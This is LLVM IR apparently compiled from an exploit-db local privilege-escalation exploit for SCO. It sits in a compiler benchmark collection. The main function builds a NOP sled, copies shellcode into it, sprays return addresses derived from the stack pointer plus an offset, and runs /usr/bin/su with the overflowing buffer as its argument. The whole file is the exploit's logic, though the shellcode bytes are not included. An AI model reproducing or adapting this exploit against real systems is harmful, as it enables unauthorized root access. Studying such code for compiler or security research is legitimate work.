; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/sco/local/extr_19643.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/sco/local/extr_19643.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@offset = common dso_local global i32 0, align 4
@nop = common dso_local global i32 0, align 4
@NOPDEF = common dso_local global i32 0, align 4
@esp = common dso_local global i32 0, align 4
@buffer = common dso_local global i32* null, align 8
@x86_nop = common dso_local global i32 0, align 4
@SIZE = common dso_local global i32 0, align 4
@shell = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [17 x i8] c"offset = [0x%x]\0A\00", align 1
@.str.1 = private unnamed_addr constant [12 x i8] c"/usr/bin/su\00", align 1
@.str.2 = private unnamed_addr constant [3 x i8] c"su\00", align 1
@.str.3 = private unnamed_addr constant [14 x i8] c"exec failed!\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %7 = load i32, i32* %4, align 4
  %8 = icmp sgt i32 %7, 1
  br i1 %8, label %9, label %18

9:                                                ; preds = %2
  %10 = load i8**, i8*** %5, align 8
  %11 = getelementptr inbounds i8*, i8** %10, i64 1
  %12 = load i8*, i8** %11, align 8
  %13 = call i64 @strtol(i8* %12, i32* null, i32 0)
  %14 = load i32, i32* @offset, align 4
  %15 = sext i32 %14 to i64
  %16 = add nsw i64 %15, %13
  %17 = trunc i64 %16 to i32
  store i32 %17, i32* @offset, align 4
  br label %18

18:                                               ; preds = %9, %2
  %19 = load i32, i32* %4, align 4
  %20 = icmp sgt i32 %19, 2
  br i1 %20, label %21, label %30

21:                                               ; preds = %18
  %22 = load i8**, i8*** %5, align 8
  %23 = getelementptr inbounds i8*, i8** %22, i64 2
  %24 = load i8*, i8** %23, align 8
  %25 = call i64 @strtoul(i8* %24, i32* null, i32 0)
  %26 = load i32, i32* @nop, align 4
  %27 = sext i32 %26 to i64
  %28 = add nsw i64 %27, %25
  %29 = trunc i64 %28 to i32
  store i32 %29, i32* @nop, align 4
  br label %32

30:                                               ; preds = %18
  %31 = load i32, i32* @NOPDEF, align 4
  store i32 %31, i32* @nop, align 4
  br label %32

32:                                               ; preds = %30, %21
  %33 = call i32 (...) @get_esp()
  store i32 %33, i32* @esp, align 4
  %34 = load i32*, i32** @buffer, align 8
  %35 = load i32, i32* @x86_nop, align 4
  %36 = load i32, i32* @SIZE, align 4
  %37 = call i32 @memset(i32* %34, i32 %35, i32 %36)
  %38 = load i32*, i32** @buffer, align 8
  %39 = load i32, i32* @nop, align 4
  %40 = sext i32 %39 to i64
  %41 = getelementptr inbounds i32, i32* %38, i64 %40
  %42 = load i32, i32* @shell, align 4
  %43 = load i32, i32* @shell, align 4
  %44 = call i32 @strlen(i32 %43)
  %45 = call i32 @memcpy(i32* %41, i32 %42, i32 %44)
  %46 = load i32, i32* @nop, align 4
  %47 = load i32, i32* @shell, align 4
  %48 = call i32 @strlen(i32 %47)
  %49 = add nsw i32 %46, %48
  store i32 %49, i32* %6, align 4
  br label %50

50:                                               ; preds = %63, %32
  %51 = load i32, i32* %6, align 4
  %52 = load i32, i32* @SIZE, align 4
  %53 = sub nsw i32 %52, 4
  %54 = icmp slt i32 %51, %53
  br i1 %54, label %55, label %66

55:                                               ; preds = %50
  %56 = load i32, i32* @esp, align 4
  %57 = load i32, i32* @offset, align 4
  %58 = add nsw i32 %56, %57
  %59 = load i32*, i32** @buffer, align 8
  %60 = load i32, i32* %6, align 4
  %61 = sext i32 %60 to i64
  %62 = getelementptr inbounds i32, i32* %59, i64 %61
  store i32 %58, i32* %62, align 4
  br label %63

63:                                               ; preds = %55
  %64 = load i32, i32* %6, align 4
  %65 = add nsw i32 %64, 4
  store i32 %65, i32* %6, align 4
  br label %50

66:                                               ; preds = %50
  %67 = load i32, i32* @esp, align 4
  %68 = load i32, i32* @offset, align 4
  %69 = add nsw i32 %67, %68
  %70 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([17 x i8], [17 x i8]* @.str, i64 0, i64 0), i32 %69)
  %71 = load i32*, i32** @buffer, align 8
  %72 = call i32 @execl(i8* getelementptr inbounds ([12 x i8], [12 x i8]* @.str.1, i64 0, i64 0), i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.2, i64 0, i64 0), i32* %71, i32* null)
  %73 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([14 x i8], [14 x i8]* @.str.3, i64 0, i64 0))
  ret i32 0
}

declare dso_local i64 @strtol(i8*, i32*, i32) #1

declare dso_local i64 @strtoul(i8*, i32*, i32) #1

declare dso_local i32 @get_esp(...) #1

declare dso_local i32 @memset(i32*, i32, i32) #1

declare dso_local i32 @memcpy(i32*, i32, i32) #1

declare dso_local i32 @strlen(i32) #1

declare dso_local i32 @printf(i8*, ...) #1

declare dso_local i32 @execl(i8*, i8*, i32*, i32*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
